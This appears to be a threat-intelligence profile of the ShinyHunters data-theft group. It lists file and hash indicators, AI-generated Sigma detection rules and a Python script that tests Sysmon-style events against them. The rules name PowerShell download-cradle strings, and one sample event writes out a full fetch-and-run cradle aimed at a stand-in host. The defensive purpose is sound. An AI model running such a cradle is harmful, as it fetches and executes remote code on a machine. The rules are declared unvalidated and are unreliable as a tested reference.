Threat Actor: ShinyHunters
Origin: Unknown
Detection rules: 1
ShinyHunters is a financially motivated cybercriminal group of unknown origin. It is known for large-scale data theft from a wide range of targets, including businesses, other organizations, and government agencies. The group typically gains initial access through phishing and exploit kits, then deploys malware on victim networks to exfiltrate personal data such as names, addresses, phone numbers, Social Security numbers, and credit card details.
Indicators of Compromise (12)

Type      Value
Filename  SECOH-QAD.exe
Filename  VID001.exe
Filename  f_000cd7.html
Filename  u992574.dll
MD5       2915b3f8b703eb744fc54c81f4a9c67f
MD5       38de5b216c33833af710e88f7f64fc98
MD5       bf9672ec85283fdf002d83662f0b08b7
MD5       dbd8dbecaa80795c135137d69921fdba
SHA-256   9896a6fcb9bb5ac1ec5297b4a65be3f647589adf7c37b45f3f7466decd6a4a7f
SHA-256   9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507
SHA-256   c0ad494457dcd9e964378760fb6aca86a23622045bca851d8f3ab49ec33978fe
SHA-256   e60ab99da105ee27ee09ea64ed8eb46d8edc92ee37f039dbc3e2bb9f587a33ba

The hashes are listed individually; this profile does not map any of them to a specific filename, so treat each as a stand-alone indicator.
Detection Rules

ShinyHunters_SIGMA_Detection (tags: sigma, ai_generated)
title: ShinyHunters - Known Payload Executed or PowerShell Cradle from Scripting Host
id: 3a8d5e1b-9d2e-4c3a-8f1d-4b2a9c7e6b8f
status: experimental
description: Process creation matching the ShinyHunters filename or hash IoCs listed above, or a PowerShell download cradle spawned from cmd.exe/cscript.exe. IoC matches are high-confidence; the cradle selection is a broader hunting signal and only fires when both the command line and the parent process match.
logsource:
    category: process_creation
    product: windows
detection:
    selection_image:
        Image|endswith:
            - '\VID001.exe'
            - '\SECOH-QAD.exe'
    selection_hashes:
        # Sysmon reports 'MD5=...,SHA256=...'; Sigma matching is case-insensitive
        Hashes|contains:
            - 'MD5=2915b3f8b703eb744fc54c81f4a9c67f'
            - 'MD5=38de5b216c33833af710e88f7f64fc98'
            - 'MD5=bf9672ec85283fdf002d83662f0b08b7'
            - 'MD5=dbd8dbecaa80795c135137d69921fdba'
            - 'SHA256=9896a6fcb9bb5ac1ec5297b4a65be3f647589adf7c37b45f3f7466decd6a4a7f'
            - 'SHA256=9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507'
            - 'SHA256=c0ad494457dcd9e964378760fb6aca86a23622045bca851d8f3ab49ec33978fe'
            - 'SHA256=e60ab99da105ee27ee09ea64ed8eb46d8edc92ee37f039dbc3e2bb9f587a33ba'
    selection_cradle_cmd:
        CommandLine|contains:
            - '-ep bypass -c'
            - 'iex(new-object net.webclient)'
            - 'Invoke-PhantomStealer'
    selection_cradle_parent:
        ParentImage|endswith:
            - '\cmd.exe'
            - '\cscript.exe'
    condition: selection_image or selection_hashes or (selection_cradle_cmd and selection_cradle_parent)
falsepositives:
    - Administrative PowerShell launched from batch or WSH scripts (tune selection_cradle_cmd)
level: high
---
title: ShinyHunters - Known Malicious DLL Loaded
status: experimental
description: A module named like the u992574.dll IoC is loaded into a process. Needs image-load telemetry (Sysmon Event ID 7 or equivalent); a process_creation log source never carries ImageLoaded.
logsource:
    category: image_load
    product: windows
detection:
    selection:
        ImageLoaded|endswith: '\u992574.dll'
    condition: selection
falsepositives:
    - Unknown
level: high
---
title: ShinyHunters - Known Malicious HTML Dropped to Disk
status: experimental
description: The f_000cd7.html IoC is written to disk, typically under the user's Temp folder. Needs file-create telemetry (Sysmon Event ID 11 or equivalent).
logsource:
    category: file_event
    product: windows
detection:
    selection:
        TargetFilename|endswith: '\f_000cd7.html'
    condition: selection
falsepositives:
    - Unknown
level: high

⚠ Rules are AI-generated and unvalidated. Test in a safe environment before production use.
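The following is an added example, not code from this page or from any detection vendor: it applies the same logic as the Sigma rule above to Sysmon-style event records, so the IoC matches and the cradle heuristic can be exercised offline. It parses Sysmon's `Hashes` field format (`MD5=...,SHA256=...`), applies the filename IoCs to whichever field carries a path (Image, ImageLoaded, TargetFilename), and requires both a cradle-looking command line and a cmd.exe/cscript.exe parent before flagging a process, which is what keeps a plain "child of cmd.exe" event from alerting. All events, paths and the `example.invalid` URL are constructed sample data.

```python
"""Evaluate Sysmon-style events against the ShinyHunters IoCs and the
PowerShell-cradle heuristic from the Sigma rule above.

Added example, not code from the original page. Event records are
constructed inline to mimic Sysmon process-creation (EID 1), image-load
(EID 7) and file-create (EID 11) fields.
"""

# IoCs from the page. Lower-cased because Sysmon emits hashes in upper-case
# hex and Sigma string matching is case-insensitive.
IOC_FILENAMES = {"secoh-qad.exe", "vid001.exe", "f_000cd7.html", "u992574.dll"}
IOC_MD5 = {
    "2915b3f8b703eb744fc54c81f4a9c67f",
    "38de5b216c33833af710e88f7f64fc98",
    "bf9672ec85283fdf002d83662f0b08b7",
    "dbd8dbecaa80795c135137d69921fdba",
}
IOC_SHA256 = {
    "9896a6fcb9bb5ac1ec5297b4a65be3f647589adf7c37b45f3f7466decd6a4a7f",
    "9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507",
    "c0ad494457dcd9e964378760fb6aca86a23622045bca851d8f3ab49ec33978fe",
    "e60ab99da105ee27ee09ea64ed8eb46d8edc92ee37f039dbc3e2bb9f587a33ba",
}

# Heuristic part of the rule: a cradle-looking command line AND a scripting-host
# parent are both required, so "parent is cmd.exe" on its own never fires.
CRADLE_PATTERNS = ("-ep bypass -c", "iex(new-object net.webclient)", "invoke-phantomstealer")
CRADLE_PARENTS = ("\\cmd.exe", "\\cscript.exe")


def parse_sysmon_hashes(field):
    """Parse Sysmon's 'Hashes' value ('MD5=..,SHA256=..') into {ALGO: lowercase hex}."""
    hashes = {}
    for part in field.split(","):
        algo, sep, value = part.partition("=")
        if sep:
            hashes[algo.strip().upper()] = value.strip().lower()
    return hashes


def basename(path):
    """Last path component, lower-cased; accepts either separator."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(event):
    """Return the names of the selections the event matches ([] means no alert)."""
    hits = []
    # Filename IoCs may appear in Image (EID 1), ImageLoaded (EID 7) or TargetFilename (EID 11).
    for field in ("Image", "ImageLoaded", "TargetFilename"):
        if field in event and basename(event[field]) in IOC_FILENAMES:
            hits.append("ioc_filename:" + field)
    parsed = parse_sysmon_hashes(event.get("Hashes", ""))
    if parsed.get("MD5") in IOC_MD5 or parsed.get("SHA256") in IOC_SHA256:
        hits.append("ioc_hash")
    cmd = event.get("CommandLine", "").lower()
    parent = event.get("ParentImage", "").lower()
    if any(p in cmd for p in CRADLE_PATTERNS) and parent.endswith(CRADLE_PARENTS):
        hits.append("powershell_cradle")
    return hits


def scan(events):
    """Return (index, hits) for every event that would raise an alert."""
    return [(i, evaluate(e)) for i, e in enumerate(events) if evaluate(e)]


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {  # known payload, matched by name and by hash
        "EventID": 1,
        "Image": r"C:\Users\bob\Downloads\VID001.exe",
        "Hashes": "MD5=2915B3F8B703EB744FC54C81F4A9C67F,SHA256=9F1F11A708D393E0A4109AE189BC64F1F3E312653DCF317A2BD406F18FFCC507",
        "ParentImage": r"C:\Windows\explorer.exe",
    },
    {  # download cradle launched from a batch script
        "EventID": 1,
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell -ep bypass -c \"iex(new-object net.webclient).downloadstring('http://example.invalid/x')\"",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
    },
    {  # benign: parent is cmd.exe but nothing else matches; must not alert
        "EventID": 1,
        "Image": r"C:\Program Files\Git\bin\git.exe",
        "CommandLine": "git pull",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
    },
    {  # IoC HTML written to the user's Temp folder
        "EventID": 11,
        "Image": r"C:\Program Files\Internet Explorer\iexplore.exe",
        "TargetFilename": r"C:\Users\bob\AppData\Local\Temp\f_000cd7.html",
    },
    {  # IoC DLL loaded into a host process
        "EventID": 7,
        "Image": r"C:\Windows\System32\rundll32.exe",
        "ImageLoaded": r"C:\Users\bob\AppData\Roaming\u992574.dll",
    },
    {  # renamed payload: filename changed, hash still known
        "EventID": 1,
        "Image": r"C:\Temp\update.exe",
        "Hashes": "SHA256=C0AD494457DCD9E964378760FB6ACA86A23622045BCA851D8F3AB49EC33978FE",
    },
]

if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(hits)}")
```

Event 2 is the case worth keeping in any regression set: with the original `1 of selection_*` condition it would have alerted purely because its parent was cmd.exe, while the renamed payload in event 5 shows why the hash selection should stay independent of the filename selection.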